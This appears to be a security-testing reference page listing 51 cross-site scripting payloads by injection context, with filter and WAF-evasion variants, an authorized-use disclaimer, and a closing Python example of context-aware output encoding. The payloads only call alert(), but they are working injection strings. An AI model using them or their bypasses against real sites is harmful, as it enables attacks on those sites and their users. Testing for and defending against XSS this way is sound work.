XSS Payload Generator
A searchable library of 50+ XSS test payloads organized by injection context. Filter by bypass type, encoding, and WAF evasion techniques.
51 payloads
Classic script injection
<script>alert(1)</script>
Image error event handler
<img src=x onerror=alert(1)>
SVG onload event
<svg onload=alert(1)>
Body onload event
<body onload=alert(1)>
Iframe with javascript URI
<iframe src="javascript:alert(1)">
Details element toggle event
<details open ontoggle=alert(1)>
Marquee onstart event
<marquee onstart=alert(1)>
Video source error event
<video><source onerror="alert(1)">
Input autofocus with onfocus
<input onfocus=alert(1) autofocus>
Select autofocus trigger
<select autofocus onfocus=alert(1)>
Textarea autofocus trigger
<textarea autofocus onfocus=alert(1)>
Mutation XSS via nested elements
<math><mtext><table><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(1) src=1>">
Break out of attribute with event
" onmouseover="alert(1)
Single-quote attribute breakout
' onfocus='alert(1)' autofocus='
Autofocus onfocus breakout
" autofocus onfocus="alert(1)
Close tag and inject SVG
"><svg onload=alert(1)>
Break JS string in attribute
'-alert(1)-'
Escape quote with backslash
\"><img src=x onerror=alert(1)>
Break out of JS string
';alert(1)//
Break out of double-quoted JS string
";alert(1)//
Template literal injection
${alert(1)}
Close script tag and open new
</script><script>alert(1)</script>
Arithmetic operator injection
'-alert(1)-'
Bypass escaped quote
\';alert(1)//
JavaScript protocol
javascript:alert(1)
Data URI with script
data:text/html,<script>alert(1)</script>
Base64-encoded data URI
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
Newline bypass in javascript protocol
java%0ascript:alert(1)
HTML entity encoded alert
<img src=x onerror="alert(1)">
No space between tag and event
<svg/onload=alert(1)>
Template literal instead of parentheses
<img src=x onerror=alert`1`>
Mixed case bypass
<ScRiPt>alert(1)</ScRiPt>
Recursive tag bypass
<scr<script>ipt>alert(1)</scr</script>ipt>
Double angle bracket bypass
<<script>alert(1)//<</script>
HTML entity encoded javascript URI
<a href="javascript:alert(1)">click</a>
Unicode escape in event handler
<img src=x onerror=\u0061lert(1)>
Slash as attribute separator
<img/src="x"/onerror=alert(1)>
CSS expression (IE)
expression(alert(1))
CSS url() with javascript
url('javascript:alert(1)')
Style attribute with javascript URL
<div style="background:url(javascript:alert(1))">
CSS import with javascript
<style>@import "data:text/css,*{background:url(javascript:alert(1))}";</style>
DOM-based via location.hash
#<img src=x onerror=alert(1)>
Exfiltrate domain via alert
<img src=1 onerror=alert(document.domain)>
Cookie stealing payload
<img src=1 onerror=alert(document.cookie)>
SVG animate event handler
<svg><animate onbegin=alert(1) attributeName=x dur=1s>
Object with data URI
<object data="data:text/html,<script>alert(1)</script>">
Isindex element event handler
<isindex type=image src=1 onerror=alert(1)>
Use id attribute for eval bypass
"><img src=x id=alert(1) onerror=eval(id)>
String concatenation bypass
<img src=x onerror=window["al"+"ert"](1)>
Regex source bypass
<img src=x onerror=top[/al/.source+/ert/.source](1)>
SVG set element event
<svg><set onbegin=alert(1)>
How to Use the XSS Payload Generator
- Search for specific payloads using the search bar.
- Filter by context: HTML, Attribute, JavaScript, URL, or CSS.
- Browse payloads with their descriptions explaining why each works.
- Click the copy button to copy a payload to your clipboard.
- Review tags to identify payload characteristics (basic, bypass, WAF evasion, etc.).
About XSS Payload Generator
Cross-Site Scripting (XSS) is one of the most common web vulnerabilities, allowing attackers to inject malicious scripts into web pages. This reference library contains test payloads organized by injection context (HTML, attribute, JavaScript, URL, CSS) and tagged with characteristics like WAF bypass techniques and encoding methods. Each payload includes an explanation of why it works. This tool is designed for authorized security testing and educational purposes to help developers understand and prevent XSS vulnerabilities.
Frequently Asked Questions
These payloads should only be used for authorized security testing on systems you own or have explicit permission to test. Unauthorized testing is illegal in most jurisdictions. This tool is intended for security professionals, developers, and CTF participants.
The injection context determines which payloads will work: in an HTML context your input lands directly in the page body; in an attribute context it goes inside an HTML tag attribute; in a JavaScript context it sits within a script block. Each requires a different escape technique.
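The context point above is also the defender's side of the same coin: the output encoding that neutralizes a value differs per context, and applying the wrong one (or none) is what lets the listed payloads work. The following is an added example, not code from this tool or from the original page; it encodes a value for the HTML body, quoted-attribute, JavaScript-string and URL (href/src) contexts, using a few of the listed payload shapes as constructed sample input. The function names and the http/https scheme allow-list are the example's own choices.

```python
import html
import json
from urllib.parse import urlsplit

# Constructed sample inputs: shapes taken from the payload list above plus a benign value.
SAMPLES = [
    "<script>alert(1)</script>",      # HTML body breakout
    '" onmouseover="alert(1)',        # double-quoted attribute breakout
    "';alert(1)//",                   # single-quoted JS string breakout
    "java\nscript:alert(1)",          # javascript: URI with an embedded newline
    "O'Reilly & Sons <b>",            # benign text that still needs encoding
]

# Hypothetical allow-list for this example; a real application would tune it.
ALLOWED_SCHEMES = {"http", "https"}


def encode_html_body(value: str) -> str:
    """HTML body context: escape & < > " ' so the text can never open a tag."""
    return html.escape(value, quote=True)


def encode_html_attr(value: str) -> str:
    """Quoted attribute context: same escaping as the body, and the template
    must always wrap the result in quotes (unquoted attributes end at a space)."""
    return html.escape(value, quote=True)


def encode_js_string(value: str) -> str:
    """JavaScript string context: emit a JS string literal via json.dumps
    (escapes quotes, backslashes, control chars and, with ensure_ascii, the
    U+2028/U+2029 line terminators), then also escape < and > so the literal
    cannot contain a closing </script> tag."""
    literal = json.dumps(value)  # ensure_ascii=True by default
    return literal.replace("<", "\\u003c").replace(">", "\\u003e")


def safe_href(url: str) -> str:
    """URL context (href/src): allow only http(s) absolute URLs or same-site
    paths. Whitespace/control characters are removed first because browsers
    ignore them inside the scheme, which is what the newline-bypass entry
    above relies on. Anything else is replaced with an inert about:blank."""
    cleaned = "".join(ch for ch in url if ch.isprintable() and not ch.isspace())
    scheme = urlsplit(cleaned).scheme.lower()
    if scheme in ALLOWED_SCHEMES:
        return html.escape(cleaned, quote=True)
    if scheme == "" and cleaned.startswith("/") and not cleaned.startswith("//"):
        return html.escape(cleaned, quote=True)  # relative path on this origin
    return "about:blank"


def render(value: str) -> dict:
    """Render one value into each context with the matching encoder applied."""
    return {
        "body": f"<p>{encode_html_body(value)}</p>",
        "attr": f'<input value="{encode_html_attr(value)}">',
        "js": f"<script>var v = {encode_js_string(value)};</script>",
        "url": f'<a href="{safe_href(value)}">link</a>',
    }


if __name__ == "__main__":
    for sample in SAMPLES:
        print(repr(sample))
        for ctx, out in render(sample).items():
            print(f"  {ctx:4s} {out}")
```

The JS encoder deliberately produces a full double-quoted literal rather than escaping characters into a template's existing quotes; that way the `'-alert(1)-'` and `';alert(1)//` shapes become inert content of the literal instead of closing it. For the URL context, encoding alone is not enough, because `javascript:` and `data:` are syntactically valid URLs; an allow-list of schemes is the check that actually blocks them.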